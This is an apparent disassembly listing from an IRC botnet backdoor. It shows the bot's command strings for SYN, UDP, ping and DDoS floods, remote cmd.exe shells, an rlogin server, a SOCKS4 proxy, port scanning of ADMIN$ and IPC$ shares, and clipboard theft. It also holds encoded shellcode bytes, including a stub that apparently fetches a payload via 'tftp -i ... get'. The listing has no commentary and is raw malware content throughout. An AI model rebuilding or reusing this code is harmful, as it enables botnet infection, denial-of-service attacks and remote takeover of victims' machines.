aNetShareListCo db '[NET]: Share list completed.',0 ; DATA XREF: sub_409557+1A0D�o
align 4
; char aShare[]
aShare db 'share',0 ; DATA XREF: sub_409557+19A5�o
align 10h
; char aContinue[]
aContinue db 'continue',0 ; DATA XREF: sub_409557+196F�o
align 4
; char aPause[]
aPause db 'pause',0 ; DATA XREF: sub_409557+1957�o
align 4
; char aStop[]
aStop db 'stop',0 ; DATA XREF: sub_409557+193F�o
align 4
aNetServiceLi_0 db '[NET]: Service list failed.',0 ; DATA XREF: sub_409557:loc_40AE8B�o
aNetServiceList db '[NET]: Service list completed.',0 ; DATA XREF: sub_409557+192A�o
align 4
; char aStart[]
aStart db 'start',0 ; DATA XREF: sub_409557+18D9�o
align 10h
aNetFailedToLoa db '[NET]: Failed to load advapi32.dll or netapi32.dll.',0
; DATA XREF: sub_409557+18A6�o
; char aNet[]
aNet db 'net',0 ; DATA XREF: sub_409557+1882�o
; char aIdentNoThreadF[]
aIdentNoThreadF db '[IDENT]: No thread found.',0 ; DATA XREF: sub_409557:loc_40ADBE�o
align 4
aIdentServerSto db '[IDENT]: Server stopped. (%d thread(s) stopped.)',0
; DATA XREF: sub_409557+185D�o
align 4
; char aOff[]
aOff db 'off',0 ; DATA XREF: sub_409557+183A�o
aIdentAlreadyRu db '[IDENT]: Already running.',0 ; DATA XREF: sub_409557+17D2�o
align 4
; char aOn[]
aOn db 'on',0 ; DATA XREF: sub_409557+17B6�o
align 4
; char aIdent[]
aIdent db 'ident',0 ; DATA XREF: sub_409557+17A1�o
align 4
; char aRf[]
aRf db 'rf',0 ; DATA XREF: sub_409557+178A�o
align 4
; char aReadfile[]
aReadfile db 'readfile',0 ; DATA XREF: sub_409557+1773�o
align 4
; char aCm[]
aCm db 'cm',0 ; DATA XREF: sub_409557+175C�o
align 4
; char aCmd_0[]
aCmd_0 db 'cmd',0 ; DATA XREF: sub_409557+1745�o
; char aMirc[]
aMirc db 'mirc',0 ; DATA XREF: sub_409557+172E�o
align 4
; char aMirccmd[]
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_409557+1717�o
; char aLi[]
aLi db 'li',0 ; DATA XREF: sub_409557+1700�o
align 10h
; char aList_0[]
aList_0 db 'list',0 ; DATA XREF: sub_409557+16E9�o
align 4
; char aDel[]
aDel db 'del',0 ; DATA XREF: sub_409557+16D2�o
; char aDelete[]
aDelete db 'delete',0 ; DATA XREF: sub_409557+16BB�o
; sub_409557+198A�o
align 4
; char aKi[]
aKi db 'ki',0 ; DATA XREF: sub_409557+16A4�o
align 4
; char aKill[]
aKill db 'kill',0 ; DATA XREF: sub_409557+168D�o
align 10h
; char aKp[]
aKp db 'kp',0 ; DATA XREF: sub_409557+1676�o
align 4
; char aKillproc[]
aKillproc db 'killproc',0 ; DATA XREF: sub_409557+165F�o
align 10h
; char aDn[]
aDn db 'dn',0 ; DATA XREF: sub_409557+1648�o
align 4
; char aDns[]
aDns db 'dns',0 ; DATA XREF: sub_409557+1631�o
; char aS3rv3rfg2[]
aS3rv3rfg2 db 's3rv3rfg2',0 ; DATA XREF: sub_409557+161A�o
align 4
; char aS3rv3rfg[]
aS3rv3rfg db 's3rv3rfg',0 ; DATA XREF: sub_409557+1603�o
align 10h
; char aO[]
aO: ; DATA XREF: sub_409557+15EC�o
unicode 0, <o>,0
; char aPr[]
aPr db 'pr',0 ; DATA XREF: sub_409557+15BE�o
align 4
; char aPrefix[]
aPrefix db 'prefix',0 ; DATA XREF: sub_409557+15A7�o
align 10h
; char aC_rn[]
aC_rn db 'c_rn',0 ; DATA XREF: sub_409557+1590�o
align 4
; char aC_rndnick[]
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_409557+1579�o
align 4
; char aC_q[]
aC_q db 'c_q',0 ; DATA XREF: sub_409557+1562�o
; char aC_quit[]
aC_quit db 'c_quit',0 ; DATA XREF: sub_409557+154B�o
align 10h
; char aK[]
aK: ; DATA XREF: sub_409557+1534�o
unicode 0, <k>,0
; char aKillthread[]
aKillthread db 'killthread',0 ; DATA XREF: sub_409557+151D�o
align 10h
; char aRaw[]
aRaw db 'raw',0 ; DATA XREF: sub_409557+14EF�o
; char aPt[]
aPt db 'pt',0 ; DATA XREF: sub_409557+14D8�o
align 4
; char aPart_0[]
aPart_0 db 'part',0 ; DATA XREF: sub_409557+14C1�o
align 10h
; char aJ[]
aJ: ; DATA XREF: sub_409557+14AA�o
unicode 0, <j>,0
; char aJoin[]
aJoin db 'join',0 ; DATA XREF: sub_409557+1493�o
align 4
; char aN[]
aN: ; DATA XREF: sub_409557+147C�o
unicode 0, <n>,0
; char aNick_0[]
aNick_0 db 'nick',0 ; DATA XREF: sub_409557+1465�o
align 4
; char aSfofofo2a[]
aSfofofo2a db 'sfofofo2a',0 ; DATA XREF: sub_409557+143F�o
align 4
; char aFofofo2[]
aFofofo2 db 'fofofo2',0 ; DATA XREF: sub_409557+142A�o
; char aTftp_0[]
aTftp_0 db 'tftp',0 ; DATA XREF: sub_409557+1415�o
align 4
; char aTftpserver[]
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_409557+1400�o
align 10h
; char aHttp[]
aHttp db 'http',0 ; DATA XREF: sub_409557+13EB�o
align 4
; char aHttpserver[]
aHttpserver db 'httpserver',0 ; DATA XREF: sub_409557+13D6�o
align 4
; char aRlogin[]
aRlogin db 'rlogin',0 ; DATA XREF: sub_409557+13C1�o
align 4
; char aRloginserver[]
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_409557+13AC�o
align 4
; char aCip[]
aCip db 'cip',0 ; DATA XREF: sub_409557+1397�o
; char aCurrentip[]
aCurrentip db 'currentip',0 ; DATA XREF: sub_409557+1382�o
align 4
; char aFdns[]
aFdns db 'fdns',0 ; DATA XREF: sub_409557+136D�o
align 4
; char aFlushdns[]
aFlushdns db 'flushdns',0 ; DATA XREF: sub_409557+1358�o
align 10h
; char aFarp[]
aFarp db 'farp',0 ; DATA XREF: sub_409557:loc_40A89A�o
align 4
; char aFlusharp[]
aFlusharp db 'flusharp',0 ; DATA XREF: sub_409557+132E�o
align 4
; char aGc[]
aGc db 'gc',0 ; DATA XREF: sub_409557+1319�o
align 4
; char aGetclip[]
aGetclip db 'getclip',0 ; DATA XREF: sub_409557+1304�o
aMainLoginListC db '[MAIN]: Login list complete.',0 ; DATA XREF: sub_409557+12F3�o
align 10h
; char aD_S[]
aD_S db '%d. %s',0 ; DATA XREF: sub_409557+12BF�o
; sub_411CF7+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_409557+12B2�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_409557+1290�o
align 10h
; char aWho[]
aWho db 'who',0 ; DATA XREF: sub_409557+1277�o
aCmd db '[CMD]',0 ; DATA XREF: sub_409557+126C�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_409557+1267�o
align 4
; char aCmdstop[]
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_409557+124E�o
; char aOcmd[]
aOcmd db 'ocmd',0 ; DATA XREF: sub_409557+1239�o
align 4
; char aOpencmd[]
aOpencmd db 'opencmd',0 ; DATA XREF: sub_409557+1224�o
; char aDll[]
aDll db 'dll',0 ; DATA XREF: sub_409557+120F�o
; char aTestdlls[]
aTestdlls db 'testdlls',0 ; DATA XREF: sub_409557+11FA�o
align 4
; char aDrv[]
aDrv db 'drv',0 ; DATA XREF: sub_409557+11E5�o
; char aDriveinfo[]
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_409557+11D0�o
align 4
; char aUp[]
aUp db 'up',0 ; DATA XREF: sub_409557+11BB�o
align 4
; char aUptime[]
aUptime db 'uptime',0 ; DATA XREF: sub_409557+11A6�o
align 10h
; char aPs[]
aPs db 'ps',0 ; DATA XREF: sub_409557+1191�o
align 4
; char aProcs[]
aProcs db 'procs',0 ; DATA XREF: sub_409557+117C�o
align 4
; char aRemov10e2[]
aRemov10e2 db 'remov10e2',0 ; DATA XREF: sub_409557+1167�o
align 4
; char aRemov10e[]
aRemov10e db 'remov10e',0 ; DATA XREF: sub_409557+1152�o
align 4
; char aSi[]
aSi db 'si',0 ; DATA XREF: sub_409557+113D�o
align 4
; char aSysinfo[]
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_409557+1128�o
; char aNi[]
aNi db 'ni',0 ; DATA XREF: sub_409557+1113�o
align 4
; char aNetinfo[]
aNetinfo db 'netinfo',0 ; DATA XREF: sub_409557+10FE�o
; char aClg[]
aClg db 'clg',0 ; DATA XREF: sub_409557+10E9�o
; char aClearlog[]
aClearlog db 'clearlog',0 ; DATA XREF: sub_409557+10D4�o
align 4
; char aLg[]
aLg db 'lg',0 ; DATA XREF: sub_409557+10BF�o
align 10h
; char aLog_0[]
aLog_0 db 'log',0 ; DATA XREF: sub_409557+10AA�o
; char aAl[]
aAl db 'al',0 ; DATA XREF: sub_409557+1095�o
align 4
; char aAliases[]
aAliases db 'aliases',0 ; DATA XREF: sub_409557+1080�o
; char aT[]
aT: ; DATA XREF: sub_409557+106B�o
unicode 0, <t>,0
; char aThreads[]
aThreads db 'threads',0 ; DATA XREF: sub_409557+1056�o
aMainFailedToRe db '[MAIN]: Failed to reboot system.',0 ; DATA XREF: sub_409557+1022�o
align 10h
; char aMainRebootingS[]
aMainRebootingS db '[MAIN]: Rebooting system.',0 ; DATA XREF: sub_409557+101B�o
align 4
; char aReboot[]
aReboot db 'reboot',0 ; DATA XREF: sub_409557+1004�o
align 4
; char aI_0[]
aI_0: ; DATA XREF: sub_409557+FEF�o
unicode 0, <i>,0
; char aId[]
aId db 'id',0 ; DATA XREF: sub_409557+FDA�o
align 4
; char aS_7[]
aS_7: ; DATA XREF: sub_409557+FC5�o
unicode 0, <s>,0
; char aStatus[]
aStatus db 'status',0 ; DATA XREF: sub_409557+FB0�o
align 4
; char aQ[]
aQ: ; DATA XREF: sub_409557+F9B�o
unicode 0, <q>,0
; char aQuit_0[]
aQuit_0 db 'quit',0 ; DATA XREF: sub_409557+F86�o
align 4
; char aDc[]
aDc db 'dc',0 ; DATA XREF: sub_409557+F71�o
align 4
; char aDisconnect[]
aDisconnect db 'disconnect',0 ; DATA XREF: sub_409557+F5C�o
align 4
; char aR[]
aR: ; DATA XREF: sub_409557+F47�o
; sub_409557+1506�o ...
unicode 0, <r>,0
; char aReconnect[]
aReconnect db 'reconnect',0 ; DATA XREF: sub_409557+F32�o
align 4
; char aStats[]
aStats db 'stats',0 ; DATA XREF: sub_409557+F1D�o
align 4
; char aScanstats[]
aScanstats db 'scanstats',0 ; DATA XREF: sub_409557+F08�o
align 4
aScan_0 db '[SCAN]',0 ; DATA XREF: sub_409557+EFD�o
align 10h
aScan db 'Scan',0 ; DATA XREF: sub_409557+EF8�o
align 4
; char aScanstop[]
aScanstop db 'scanstop',0 ; DATA XREF: sub_409557+EDF�o
align 4
aSecure_0 db '[SECURE]',0 ; DATA XREF: sub_409557+ED4�o
align 10h
aSecure db 'Secure',0 ; DATA XREF: sub_409557+ECF�o
align 4
; char aSecurestop[]
aSecurestop db 'securestop',0 ; DATA XREF: sub_409557+EB6�o
align 4
aClones db '[CLONES]',0 ; DATA XREF: sub_409557+EAB�o
align 10h
aClone db 'Clone',0 ; DATA XREF: sub_409557+EA6�o
align 4
; char aClonestop[]
aClonestop db 'clonestop',0 ; DATA XREF: sub_409557+E8D�o
align 4
; char aPsstop[]
aPsstop db 'psstop',0 ; DATA XREF: sub_409557+E78�o
align 4
; char aProcsstop[]
aProcsstop db 'procsstop',0 ; DATA XREF: sub_409557+E63�o
align 4
aTftp db '[TFTP]',0 ; DATA XREF: sub_409557+E58�o
align 10h
; char aTftpstop[]
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_409557+E3A�o
align 4
aPing_0 db '[PING]',0 ; DATA XREF: sub_409557+E2F�o
align 4
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_409557+E2A�o
align 10h
; char aPingstop[]
aPingstop db 'pingstop',0 ; DATA XREF: sub_409557+E11�o
align 4
aUpd db '[UPD]',0 ; DATA XREF: sub_409557+E06�o
align 4
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_409557+E01�o
align 10h
; char aUdpstop[]
aUdpstop db 'udpstop',0 ; DATA XREF: sub_409557+DE8�o
aSyn db '[SYN]',0 ; DATA XREF: sub_409557+DDD�o
align 10h
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_409557+DD8�o
align 4
; char aSynstop[]
aSynstop db 'synstop',0 ; DATA XREF: sub_409557+DBF�o
aDdos db '[DDoS]',0 ; DATA XREF: sub_409557+DB4�o
align 4
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_409557+DAF�o
align 4
; char aDdos_stop[]
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_409557+D96�o
align 4
aRedirect db '[REDIRECT]',0 ; DATA XREF: sub_409557+D8B�o
align 10h
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_409557+D86�o
align 10h
; char aRedirectstop[]
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_409557+D6D�o
align 10h
aLog db '[LOG]',0 ; DATA XREF: sub_409557+D62�o
align 4
aLogList db 'Log list',0 ; DATA XREF: sub_409557+D5D�o
align 4
; char aLogstop[]
aLogstop db 'logstop',0 ; DATA XREF: sub_409557+D44�o
aHttpd db '[HTTPD]',0 ; DATA XREF: sub_409557+D39�o
; char aHttpstop[]
aHttpstop db 'httpstop',0 ; DATA XREF: sub_409557+D1B�o
align 10h
aRlogind db '[RLOGIND]',0 ; DATA XREF: sub_409557+D10�o
align 4
; char aRloginstop[]
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_409557+CF2�o
align 4
aSocks4_0 db '[SOCKS4]',0 ; DATA XREF: sub_409557+CE7�o
align 4
aServer_0 db 'Server',0 ; DATA XREF: sub_409557+CE2�o
; sub_409557+D0B�o ...
align 4
; char aSocks4stop[]
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_409557+CC9�o
align 4
; char aS4[]
aS4 db 's4',0 ; DATA XREF: sub_409557+CB4�o
align 4
; char aSocks4[]
aSocks4 db 'socks4',0 ; DATA XREF: sub_409557+C9F�o
align 4
; char aVer[]
aVer db 'ver',0 ; DATA XREF: sub_409557+C8A�o
; char aVersion[]
aVersion db 'version',0 ; DATA XREF: sub_409557+C75�o
; char aLo[]
aLo db 'lo',0 ; DATA XREF: sub_409557+C60�o
align 4
; char aLogout[]
aLogout db 'logout',0 ; DATA XREF: sub_409557+C4B�o
align 4
; char aD_0[]
aD_0: ; DATA XREF: sub_409557+C36�o
unicode 0, <d>,0
; char aDie[]
aDie db 'die',0 ; DATA XREF: sub_409557+C21�o
; char aRn[]
aRn db 'rn',0 ; DATA XREF: sub_409557+C0C�o
align 4
; char aRndnick_0[]
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_409557+BF4�o
; char a63[]
a63 db '63',0 ; DATA XREF: sub_409557+ACD�o
align 4
; char asc_4271E4[]
asc_4271E4: ; DATA XREF: sub_409557+AA5�o
unicode 0, <)>,0
; char aChr[]
aChr db '$chr(',0 ; DATA XREF: sub_409557+A68�o
align 10h
; char aServer[]
aServer db '$server',0 ; DATA XREF: sub_409557+A5D�o
; char aRndnick[]
aRndnick db '$rndnick',0 ; DATA XREF: sub_409557+A4C�o
align 4
; char aChan[]
aChan db '$chan',0 ; DATA XREF: sub_409557+A30�o
align 4
; char aUser_1[]
aUser_1 db '$user',0 ; DATA XREF: sub_409557+A1F�o
align 4
; char aMe[]
aMe db '$me',0 ; DATA XREF: sub_409557+A0D�o
; char aD_1[]
aD_1 db '$%d',0 ; DATA XREF: sub_409557+99F�o
; char aD[]
aD db '$%d-',0 ; DATA XREF: sub_409557+8E4�o
align 4
dword_427224 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_409557+879�o
dd 0A0Dh
; char dword_42723C
dword_42723C dd 4E495001h, 47h ; DATA XREF: sub_409557+845�o
dword_427244 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_409557+83A�o
dd 0D017325h, 0Ah
; char dword_427260
dword_427260 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_409557+809�o
; char asc_42726C[]
asc_42726C db '#',0 ; DATA XREF: sub_409557+780�o
align 10h
; char aFr[]
aFr db 'Fr',0 ; DATA XREF: sub_409557+6D9�o
align 4
; char aHi[]
aHi db 'hi',0 ; DATA XREF: sub_409557+6C4�o
align 4
; char a332[]
a332 db '332',0 ; DATA XREF: sub_409557+635�o
; sub_409557+6FB�o ...
; char aMainUserSLog_0[]
aMainUserSLog_0 db '[MAIN]: User: %s logged out.',0 ; DATA XREF: sub_409557+5B6�o
align 4
aMainJoinedChan db '[MAIN]: Joined channel: %s.',0 ; DATA XREF: sub_409557+596�o
; char a353[]
a353 db '353',0 ; DATA XREF: sub_409557+55F�o
; char aPart[]
aPart db 'PART',0 ; DATA XREF: sub_409557+511�o
; sub_409557+5D3�o
align 4
; char aSS_3[]
aSS_3 db ':%s%s',0 ; DATA XREF: sub_409557+4E9�o
align 4
; char aNick[]
aNick db 'NICK',0 ; DATA XREF: sub_409557+3CB�o
align 4
; char aNoticeSS[]
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409557+36E�o
; sub_409557+5F7�o
; char aMainUserSLogge[]
aMainUserSLogge db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_409557+355�o
; sub_409557+519D�o ...
; char aKick[]
aKick db 'KICK',0 ; DATA XREF: sub_409557+2E4�o
align 4
; char aNickS[]
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_409557+28D�o
; sub_409557+4225�o ...
align 4
; char a433[]
a433 db '433',0 ; DATA XREF: sub_409557+265�o
; char a[]
a@: ; DATA XREF: sub_409557+23A�o
unicode 0, <@>,0
; char a302[]
a302 db '302',0 ; DATA XREF: sub_409557+22A�o
; char a005[]
a005 db '005',0 ; DATA XREF: sub_409557+215�o
; char a001[]
a001 db '001',0 ; DATA XREF: sub_409557+200�o
; char aJoinSS[]
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_409557+1E4�o
; sub_409557+3B8�o ...
align 4
; char aPongS[]
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_409557+1C3�o
align 4
; char aPing[]
aPing db 'PING',0 ; DATA XREF: sub_409557+1A9�o
align 4
; char asc_42734C[]
asc_42734C: ; DATA XREF: sub_409557+19A�o
; sub_409557+52A8�o
unicode 0, <!>,0
; char asc_427350[]
asc_427350 db ' :',0 ; DATA XREF: sub_409557+86�o
; sub_409557:loc_409DDA�o
align 4
; char aRedirectFail_0[]
aRedirectFail_0 db '[REDIRECT]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40E9B2+156�o
; char aRedirectClient[]
aRedirectClient db '[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40E9B2+E1�o
align 10h
; char aRedirectFail_1[]
aRedirectFail_1 db '[REDIRECT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_40EB3A+1AA�o
; char aRedirectClie_0[]
aRedirectClie_0 db '[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40EB3A+E1�o
align 4
; char aPrivmsgSS[]
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_40EE26+33�o
aCmdCouldNotR_0 db '[CMD]: Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_40EEAD:loc_40EFDF�o
aCmdProccessHas db '[CMD]: Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_40EEAD+10F�o
align 4
aCmdCouldNotRea db '[CMD]: Could not read data from proccess',0Dh,0Ah,0
; DATA XREF: sub_40EEAD:loc_40EF93�o
align 4
; char aCmdFailedToSta[]
aCmdFailedToSta db '[CMD]: Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_40F002+194�o
align 4
; char aCmdRemoteComma[]
aCmdRemoteComma db '[CMD]: Remote Command Prompt',0 ; DATA XREF: sub_40F002+14C�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40F002+21�o
; char aRlogindUserL_0[]
aRlogindUserL_0 db '[RLOGIND]: User logged out: <%s@%s>.',0 ; DATA XREF: sub_40F1B7+1E9�o
align 4
; char aRlogindErrorSe[]
aRlogindErrorSe db '[RLOGIND]: Error: SessionRun(): <%d>.',0 ; DATA XREF: sub_40F1B7+1C2�o
align 10h
; char aRlogindUserLog[]
aRlogindUserLog db '[RLOGIND]: User logged in: <%s@%s>.',0 ; DATA XREF: sub_40F1B7+1A2�o
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_40F1B7+172�o
align 4
; char aRlogindErrorGe[]
aRlogindErrorGe db '[RLOGIND]: Error: getpeername(): <%d>.',0 ; DATA XREF: sub_40F1B7+E1�o
align 10h
; char aRlogindProtoco[]
aRlogindProtoco db '[RLOGIND]: Protocol string too long.',0
; DATA XREF: sub_40F3BC:loc_40F401�o
align 4
; char aRlogindLoginRe[]
aRlogindLoginRe db '[RLOGIND]: Login rejected, Remote user: <%s@%s>.',0
; DATA XREF: sub_40F416+1B�o
align 4
; char aRlogindError_0[]
aRlogindError_0 db '[RLOGIND]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_40F445+219�o
align 10h
; char aRlogindFaile_1[]
aRlogindFaile_1 db '[RLOGIND]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40F445+1FB�o
align 4
; char aRlogindClientC[]
aRlogindClientC db '[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40F445+177�o
aRlogindReadyAn db '[RLOGIND]: Ready and waiting for incoming connections.',0
; DATA XREF: sub_40F445+106�o
align 10h
; char aRlogindFaile_0[]
aRlogindFaile_0 db '[RLOGIND]: Failed to install control-C handler, error: <%d>.',0
; DATA XREF: sub_40F445+70�o
align 10h
; char aRlogindErrorWs[]
aRlogindErrorWs db '[RLOGIND]: Error: WSAStartup(): <%d>.',0 ; DATA XREF: sub_40F445+3D�o
align 4
aConst db 'const',0
align 10h
dd 0
dword_427794 dd 1 ; DATA XREF: sub_40FA38+7�o
off_427798 dd offset sub_40F6CD ; DATA XREF: sub_40FA38+49�r
aLetter db 'letter',0
align 8
dd 2, 40F72Bh, 706D6F63h, 2 dup(0)
dd 3, 40F778h, 6E756F63h, 797274h, 0
dd 4, 40F816h, 736Fh, 2 dup(0)
dd 5, 40F88Bh
; char aSI[]
aSI db '%s%i',0 ; DATA XREF: sub_40F6CD+40�o
; .text:0040F7F7�o ...
align 4
byte_4277F4 db 50h ; DATA XREF: .text:0040F79A�o
; .text:0040F7A7�r
db 43h, 2 dup(0)
dword_4277F8 dd 7C7325h ; DATA XREF: .text:0040F845�o
; sub_40FA38+39�o
aS_5 db '[%s]|',0 ; DATA XREF: .text:0040F94F�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_40F946�o
; sub_410E85:loc_410F48�o
a2k3 db '2K3',0 ; DATA XREF: .text:0040F93F�o
aXp db 'XP',0 ; DATA XREF: .text:0040F931�o
; sub_410E85+AA�o
align 10h
a2k db '2K',0 ; DATA XREF: .text:0040F921�o
; sub_410E85+98�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:0040F908�o
; sub_410E85+7E�o
align 4
a98 db '98',0 ; DATA XREF: .text:0040F8F8�o
; sub_410E85+6C�o
align 4
aNt db 'NT',0 ; DATA XREF: .text:0040F8E8�o
; sub_410E85+5A�o
align 10h
a95 db '95',0 ; DATA XREF: .text:0040F8DA�o
; sub_410E85+46�o
align 4
; char aDS[]
aDS db '[%d]%s',0 ; DATA XREF: sub_40F995+3A�o
align 4
; char aM[]
aM db '[M]',0 ; DATA XREF: sub_40F995+2C�o
; sub_40F995+57�o
; char aScanIpSPortD_0[]
aScanIpSPortD_0 db '[SCAN]: IP: %s Port: %d is open.',0 ; DATA XREF: sub_40FAA1+92�o
align 4
; char aScanScanningIp[]
aScanScanningIp db '[SCAN]: Scanning IP: %s, Port: %d.',0 ; DATA XREF: sub_40FB6E+41�o
align 4
dd offset aIpc_0 ; "IPC$"
align 10h
dd offset aAdmin_0 ; "ADMIN$"
align 8
dd offset dword_4278A4
dd offset dword_4278A0
dd offset dword_42789C
dd offset dword_427898
dword_427898 dd 5C3A44h ; DATA XREF: .data:00427894�o
dword_42789C dd 2444h ; DATA XREF: .data:00427890�o
dword_4278A0 dd 5C3A43h ; DATA XREF: .data:0042788C�o
dword_4278A4 dd 2443h ; DATA XREF: .data:00427888�o
aAdmin_0 db 'ADMIN$',0 ; DATA XREF: .data:00427880�o
align 10h
aIpc_0 db 'IPC$',0 ; DATA XREF: .data:00427878�o
align 4
; char aRlogindWaitfor[]
aRlogindWaitfor db '[RLOGIND]: WaitForMultipleObjects error: <%d>.',0
; DATA XREF: sub_40FC5F+DE�o
align 4
; char aRlogindFaile_2[]
aRlogindFaile_2 db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: sub_40FC5F+59�o
; sub_40FC5F+8B�o
db '.',0
align 4
aRlogindFaile_5 db '[RLOGIND]: Failed to execute shell.',0 ; DATA XREF: sub_40FDB0+AF�o
; char aRlogindFaile_4[]
aRlogindFaile_4 db '[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.',0
; DATA XREF: sub_40FDB0+7E�o
align 4
aRlogindFaile_3 db '[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.',0
; DATA XREF: sub_40FDB0+5C�o
; char aRlogindFaile_6[]
aRlogindFaile_6 db '[RLOGIND]: Failed to execute shell, error: <%d>.',0
; DATA XREF: sub_40FEA9+C3�o
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_40FEA9+8C�o
align 4
; char aRlogindSession[]
aRlogindSession db '[RLOGIND]: SessionReadShellThread exited, error: <%ld>.',0
; DATA XREF: sub_40FF82+A1�o
dword_427A3C dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_4102EE+C4�o
db 66h, 0B9h
word_427A4A dw 0FFFFh ; DATA XREF: sub_4102EE+CC�w
db 80h, 73h, 0Eh
byte_427A4F db 0FFh ; DATA XREF: sub_4102EE+D3�w
dd 0F9E243h
dword_427A54 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_4102EE+A2�o
db 0B1h
byte_427A61 db 0FFh ; DATA XREF: sub_4102EE+AA�w
dw 7380h
db 0Ch
byte_427A65 db 0FFh ; DATA XREF: sub_4102EE+B0�w
dw 0E243h
dd 0F9h
dword_427A6C dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_410177+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_427AD0 dd 12h ; DATA XREF: sub_410177+3D�w
dd 70746674h, 6578652Eh, 20692D20h
aGet_0 db ' get ',0 ; DATA XREF: sub_410177+79�o
; sub_410177+9B�o
aJ_1 db 'j',0
db 0E8h
dword_427AE9 dd 17h ; DATA XREF: sub_410177+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_427AF1 dd 1 ; DATA XREF: sub_410177+45�w
byte_427AF5 db 0, 6Ah, 0 ; DATA XREF: sub_410177+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_427AFF dd 0FFFFFFEDh ; DATA XREF: sub_410177+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h
; char aSocks4Failed_1[]
aSocks4Failed_1 db '[SOCKS4]: Failed to start server on Port %d.',0
; DATA XREF: sub_4103F5+1B2�o
align 10h
; char aSocks4Failed_0[]
aSocks4Failed_0 db '[SOCKS4]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_4103F5+18F�o
align 4
; char aSocks4ClientCo[]
aSocks4ClientCo db '[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_4103F5+114�o
align 4
; char aSocks4ErrorF_0[]
aSocks4ErrorF_0 db '[SOCKS4]: Error: Failed to connect to target, returned: <%d>.',0
; DATA XREF: sub_4105FA+1F9�o
align 4
; char aSocks4ErrorFai[]
aSocks4ErrorFai db '[SOCKS4]: Error: Failed to open socket(), returned: <%d>.',0
; DATA XREF: sub_4105FA+18A�o
align 4
; char aSocks4Authenti[]
aSocks4Authenti db '[SOCKS4]: Authentication failed. Remote userid: %s != %s.',0
; DATA XREF: sub_4105FA+F2�o
align 10h
; char aSynDoneWithFlo[]
aSynDoneWithFlo db '[SYN]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_4109BE+48�o
align 4
; char aSynSendErrorD_[]
aSynSendErrorD_ db '[SYN]: Send error: <%d>.',0 ; DATA XREF: sub_410A5A+27D�o
align 10h
; char aDdDhDm[]
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_410D66+52�o
; char aSysinfoCpuI64u[]
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_410E85+297�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
